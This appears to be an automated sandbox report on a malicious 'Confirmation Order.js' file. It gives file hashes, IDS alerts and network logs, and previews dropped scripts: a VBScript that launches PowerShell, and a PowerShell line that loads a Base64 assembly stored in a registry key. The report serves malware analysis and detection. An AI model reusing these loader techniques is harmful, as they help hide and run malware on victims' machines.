                          Preview:...................................FL..................F.".. ...]...z...sT..g...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z...C...g...}...g.......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.X.>..........................B...A.p.p.D.a.t.a...B.V.1......X.>..Roaming.@......EW.V.X.>..............................R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.X.>..............................M.i.c.r.o.s.o.f.t.....V.1.....EW'Y..Windows.@......EW.V.X.>..........................9[..W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V.X.>....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V.X.>....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.X.>................
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ISO-8859 text
                          Category:dropped
                          Size (bytes):1852
                          Entropy (8bit):5.004514030507113
                          Encrypted:false
                          SSDEEP:48:d6+8xhzponOjeVwyIMlT9tLklgjHjkR1e+7cjWgr2DnPTbrn5It:oFTExP17SWCnPTmt
                          MD5:DF8FF588CDD485FA5A69AC6622D2F279
                          SHA1:68AB587161288872A49A3AAC287F61B9C6957AE3
                          SHA-256:034AD208A95827C958F8D30D4F4DBE1B630C0CB60AED8E229D52DF64816D8A46
                          SHA-512:9D8BAAAD38FDE02CAEC0D2A48B5C47B22E74B187CFAA82F1849B08172072EFA5DC9FA0A11BD4C907A6CA2AF2C184BADD61549B0603B645190A39BB7970721475
                          Malicious:true
                          Preview:Option Explicit.'Project Name: YLhjFraZZwiadZg.' D.claration des variables.Dim objShell, windowsDir, i.Set objShell = CreateObject("WScript.Shell").windowsDir = objShell.ExpandEnvironmentStrings("%windir%")..' Fonction pour v.rifier si un processus sp.cifique est en cours d'ex.cution.Function IsProcessRunning(processName). Dim objWMIService, colProcesses. Set objWMIService = GetObject("winmgmts:\\.\root\cimv2"). Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'"). . IsProcessRunning = (colProcesses.Count > 0).End Function..' Subroutine pour ex.cuter une s.quence de commandes dans PowerShell.Sub RunPowerShellCommands(). Dim colProcesses, objProcess. . ' Lancer PowerShell en mode fen.tr. normal. objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2. . ' Attendre que PowerShell soit lanc. et envoyer des commandes. Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                          Category:dropped
                          Size (bytes):1481
                          Entropy (8bit):4.478536023971032
                          Encrypted:false
                          SSDEEP:24:hWNvNa2V269+IzEjSjeKm3uSmwpW7iX4WLeX4WgeX4WgeX4WneX4WueX4WEeX4WT:hWxZzEKAMiX+X5XpXKX/XFXoXQXDX5
                          MD5:EBE672400E65F143E3590D7D2649C5E3
                          SHA1:69EDDB76837C9E68C272F98B3B29FE1A27FDFD38
                          SHA-256:399ECD0C40EC3A2249047B0D359109A14AC3922385A034D09CB0961872220872
                          SHA-512:270559EEE37589358602453B726970454E6357F8AA35B75A76C034282D54D38E63930020D78DBFA0EC37CD777BE488BA0A2286977F0D6244ACFC7C46706A5052
                          Malicious:false
                          Preview:.[33m[.[37mAppDomain.[33m]::.[97mCurrentDo.[33m.[45m.[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\YLhjFraZZwiadZg'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37ma.a.[33m]::.[97ma.[33m(.[36m'YLhjFraZZwiadZg'.[33m).[33m.[45m.[0metape 1 passed lol..etape 2 passed...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[90m-.[33m.[4
                          File type:Unicode text, UTF-8 text, with very long lines (57447), with CRLF line terminators
                          Entropy (8bit):3.463211710178609
                          TrID:
                          • Digital Micrograph Script (4001/1) 100.00%
                          File name:Confirmation Order.js
                          File size:277'595 bytes
                          MD5:06423b5a0a4d4f444ea943e2bdaa5461
                          SHA1:3f839dd6da834bc4df8faf8bac49dd7f34b5cd50
                          SHA256:3071ac42b0c7407d7982843858e9df6a697f4b83dd4281394fef5e79bfea2bb5
                          SHA512:ce60a82182ab2cc122b50a34131d0c376ebf1c14286658603199a4eefb6153bae18201400a5b29c4dbead906be9aeb028155a1d1af531c1fb81cf79e00f5d759
                          SSDEEP:1536:PfINtK3IadjNM9h/IaOlaStsiuvErox1Rti/KCEBFjgnC2EoKyr/sK4tF6ROX1Lu:PIyuvuM2EM0l3hWAzmp4h2GWjyHW
                          TLSH:D044DFB890DA45E0F00FCD916A98FEB5A53732E3F7D609751338F6048B8AE652C494DE
                          File Content Preview://YLhjFraZZwiadZg..//YLhjFraZZwiadZg..// D..clarations des constantes..var CONST_GCU = 0x80000001;..var CONST_REG_SZ = 1;....// D..clarations des variables globales..var shellInstance, fileSystemInstance, registryShell;..var directoryName, mainFile, tempS
                          Icon Hash:68d69b8bb6aa9a86
                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-25T09:54:39.725147+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH6439880192.168.2.11132.226.247.73
                          2024-07-25T09:54:53.820871+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update64423443192.168.2.1120.42.65.92
                          2024-07-25T09:54:49.971055+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H64420443192.168.2.11188.114.97.3
                          2024-07-25T09:55:12.299242+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436442420.12.23.50192.168.2.11
                          2024-07-25T09:54:41.692865+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H64401443192.168.2.11188.114.97.3
                          2024-07-25T09:54:47.197640+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H64413443192.168.2.11188.114.97.3
                          2024-07-25T09:54:42.472412+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH6440280192.168.2.11132.226.247.73
                          2024-07-25T09:54:41.084532+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH6439880192.168.2.11132.226.247.73
                          2024-07-25T09:54:31.787381+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971220.12.23.50192.168.2.11
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 25, 2024 09:54:07.147061110 CEST49671443192.168.2.11204.79.197.203
                          Jul 25, 2024 09:54:09.553282976 CEST49671443192.168.2.11204.79.197.203
                          Jul 25, 2024 09:54:09.959467888 CEST49674443192.168.2.11173.222.162.42
                          Jul 25, 2024 09:54:10.100143909 CEST49673443192.168.2.11173.222.162.42
                          Jul 25, 2024 09:54:12.470937014 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:12.476069927 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:12.476172924 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:12.476365089 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:12.481373072 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.167182922 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.167284012 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.167401075 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.167414904 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.167462111 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.168325901 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.168382883 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.397365093 CEST49676443192.168.2.1120.189.173.3
                          Jul 25, 2024 09:54:13.490087986 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.490293980 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.490371943 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.490427017 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.490475893 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.490524054 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.490945101 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.490968943 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.490983963 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.491029978 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.491053104 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.509803057 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.515229940 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.709537029 CEST49676443192.168.2.1120.189.173.3
                          Jul 25, 2024 09:54:13.718326092 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.718420982 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.718525887 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.718568087 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.718703032 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.718750000 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.720349073 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.720434904 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.720613003 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.720690966 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.721126080 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.721160889 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.721184969 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.721206903 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.722064972 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.722130060 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.722479105 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.722512960 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.722546101 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.722570896 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:13.810684919 CEST8049711104.21.37.117192.168.2.11
                          Jul 25, 2024 09:54:13.810771942 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:14.318871021 CEST49676443192.168.2.1120.189.173.3
                          Jul 25, 2024 09:54:14.363609076 CEST49671443192.168.2.11204.79.197.203
                          Jul 25, 2024 09:54:15.522013903 CEST49676443192.168.2.1120.189.173.3
                          Jul 25, 2024 09:54:17.928270102 CEST49676443192.168.2.1120.189.173.3
                          Jul 25, 2024 09:54:19.568886995 CEST49674443192.168.2.11173.222.162.42
                          Jul 25, 2024 09:54:19.709527016 CEST49673443192.168.2.11173.222.162.42
                          Jul 25, 2024 09:54:21.519829988 CEST44349710173.222.162.42192.168.2.11
                          Jul 25, 2024 09:54:21.520284891 CEST49710443192.168.2.11173.222.162.42
                          Jul 25, 2024 09:54:22.740748882 CEST49676443192.168.2.1120.189.173.3
                          Jul 25, 2024 09:54:23.975182056 CEST49671443192.168.2.11204.79.197.203
                          Jul 25, 2024 09:54:31.920697927 CEST4971180192.168.2.11104.21.37.117
                          Jul 25, 2024 09:54:32.350147963 CEST49676443192.168.2.1120.189.173.3
                          Jul 25, 2024 09:54:34.732996941 CEST6439753192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:34.738244057 CEST53643971.1.1.1192.168.2.11
                          Jul 25, 2024 09:54:34.738362074 CEST6439753192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:34.738456011 CEST6439753192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:34.743761063 CEST53643971.1.1.1192.168.2.11
                          Jul 25, 2024 09:54:35.194684982 CEST53643971.1.1.1192.168.2.11
                          Jul 25, 2024 09:54:35.240766048 CEST6439753192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:35.242984056 CEST6439753192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:35.248445988 CEST53643971.1.1.1192.168.2.11
                          Jul 25, 2024 09:54:35.248554945 CEST6439753192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:38.778289080 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:38.783243895 CEST8064398132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:38.783325911 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:38.783755064 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:38.788846016 CEST8064398132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:39.456392050 CEST8064398132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:39.470530033 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:39.477601051 CEST8064398132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:39.677747965 CEST8064398132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:39.725147009 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:40.082199097 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.082235098 CEST44364399188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:40.082839966 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.093724966 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.093740940 CEST44364399188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:40.639288902 CEST44364399188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:40.639453888 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.648247004 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.648260117 CEST44364399188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:40.648566008 CEST44364399188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:40.693897009 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.714633942 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.756541014 CEST44364399188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:40.827970028 CEST44364399188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:40.828094959 CEST44364399188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:40.828154087 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.834009886 CEST64399443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:40.837368965 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:40.842294931 CEST8064398132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:41.042892933 CEST8064398132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:41.046505928 CEST64401443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:41.046544075 CEST44364401188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:41.046720028 CEST64401443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:41.047058105 CEST64401443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:41.047069073 CEST44364401188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:41.084532022 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:41.524561882 CEST44364401188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:41.527250051 CEST64401443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:41.527277946 CEST44364401188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:41.692883015 CEST44364401188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:41.692989111 CEST44364401188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:41.693181992 CEST64401443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:41.693851948 CEST64401443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:41.708509922 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:41.709677935 CEST6440280192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:41.714071035 CEST8064398132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:41.714154005 CEST6439880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:41.714745998 CEST8064402132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:41.714823008 CEST6440280192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:41.715010881 CEST6440280192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:41.720396996 CEST8064402132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:42.424376965 CEST8064402132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:42.428219080 CEST64405443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:42.428277969 CEST44364405188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:42.428581953 CEST64405443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:42.429368019 CEST64405443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:42.429385900 CEST44364405188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:42.472412109 CEST6440280192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:42.894954920 CEST44364405188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:42.896507025 CEST64405443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:42.896553040 CEST44364405188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:43.049077034 CEST44364405188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:43.049174070 CEST44364405188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:43.049222946 CEST64405443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:43.050225973 CEST64405443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:43.097582102 CEST6440680192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:43.106175900 CEST8064406132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:43.106353045 CEST6440680192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:43.106553078 CEST6440680192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:43.116379976 CEST8064406132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:43.821763992 CEST8064406132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:43.823296070 CEST64407443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:43.823343039 CEST44364407188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:43.823415995 CEST64407443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:43.823690891 CEST64407443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:43.823707104 CEST44364407188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:43.865762949 CEST6440680192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:44.293375969 CEST44364407188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:44.295321941 CEST64407443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:44.295345068 CEST44364407188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:44.437872887 CEST44364407188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:44.437974930 CEST44364407188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:44.438123941 CEST64407443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:44.443317890 CEST64407443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:44.450094938 CEST6440880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:44.451122046 CEST6440680192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:44.459517002 CEST8064408132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:44.459814072 CEST8064406132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:44.459893942 CEST6440680192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:44.459904909 CEST6440880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:44.462959051 CEST6440880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:44.469043970 CEST8064408132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:45.162084103 CEST8064408132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:45.164474010 CEST64410443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:45.164535999 CEST44364410188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:45.164606094 CEST64410443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:45.165246010 CEST64410443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:45.165267944 CEST44364410188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:45.209521055 CEST6440880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:45.634722948 CEST44364410188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:45.636635065 CEST64410443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:45.636665106 CEST44364410188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:45.780087948 CEST44364410188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:45.780179024 CEST44364410188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:45.780229092 CEST64410443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:45.780980110 CEST64410443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:45.784584999 CEST6440880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:45.785574913 CEST6441180192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:45.791057110 CEST8064408132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:45.791193962 CEST6440880192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:45.791570902 CEST8064411132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:45.791646004 CEST6441180192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:45.791760921 CEST6441180192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:45.796617985 CEST8064411132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:46.499396086 CEST8064411132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:46.505935907 CEST64413443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:46.505985975 CEST44364413188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:46.506073952 CEST64413443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:46.506537914 CEST64413443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:46.506553888 CEST44364413188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:46.553405046 CEST6441180192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:47.041908026 CEST44364413188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:47.043631077 CEST64413443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:47.043673038 CEST44364413188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:47.197664022 CEST44364413188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:47.197761059 CEST44364413188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:47.198126078 CEST64413443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:47.198530912 CEST64413443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:47.202133894 CEST6441180192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:47.203509092 CEST6441480192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:47.209871054 CEST8064411132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:47.209956884 CEST6441180192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:47.211467981 CEST8064414132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:47.211555958 CEST6441480192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:47.211688042 CEST6441480192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:47.216753960 CEST8064414132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:47.906349897 CEST8064414132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:47.907996893 CEST64416443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:47.908046007 CEST44364416188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:47.908133984 CEST64416443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:47.908488989 CEST64416443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:47.908503056 CEST44364416188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:47.959600925 CEST6441480192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:48.457931042 CEST44364416188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:48.459947109 CEST64416443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:48.459980011 CEST44364416188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:48.598745108 CEST44364416188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:48.598850965 CEST44364416188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:48.598927975 CEST64416443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:48.599559069 CEST64416443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:48.603197098 CEST6441480192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:48.604171038 CEST6441780192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:48.609752893 CEST8064417132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:48.609791040 CEST8064414132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:48.609852076 CEST6441780192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:48.609880924 CEST6441480192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:48.610006094 CEST6441780192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:48.616588116 CEST8064417132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:49.329843998 CEST8064417132.226.247.73192.168.2.11
                          Jul 25, 2024 09:54:49.333009005 CEST64420443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:49.333051920 CEST44364420188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:49.333117008 CEST64420443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:49.333596945 CEST64420443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:49.333611965 CEST44364420188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:49.372092962 CEST6441780192.168.2.11132.226.247.73
                          Jul 25, 2024 09:54:49.821546078 CEST44364420188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:49.823523998 CEST64420443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:49.823568106 CEST44364420188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:49.971064091 CEST44364420188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:49.971155882 CEST44364420188.114.97.3192.168.2.11
                          Jul 25, 2024 09:54:49.971236944 CEST64420443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:54:49.971893072 CEST64420443192.168.2.11188.114.97.3
                          Jul 25, 2024 09:55:47.424026966 CEST8064402132.226.247.73192.168.2.11
                          Jul 25, 2024 09:55:47.424140930 CEST6440280192.168.2.11132.226.247.73
                          Jul 25, 2024 09:55:54.345120907 CEST8064417132.226.247.73192.168.2.11
                          Jul 25, 2024 09:55:54.345242023 CEST6441780192.168.2.11132.226.247.73
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 25, 2024 09:54:12.446276903 CEST5028753192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:12.465069056 CEST53502871.1.1.1192.168.2.11
                          Jul 25, 2024 09:54:34.732474089 CEST53493421.1.1.1192.168.2.11
                          Jul 25, 2024 09:54:38.764331102 CEST6060953192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:38.772079945 CEST53606091.1.1.1192.168.2.11
                          Jul 25, 2024 09:54:40.072732925 CEST6279753192.168.2.111.1.1.1
                          Jul 25, 2024 09:54:40.080595970 CEST53627971.1.1.1192.168.2.11
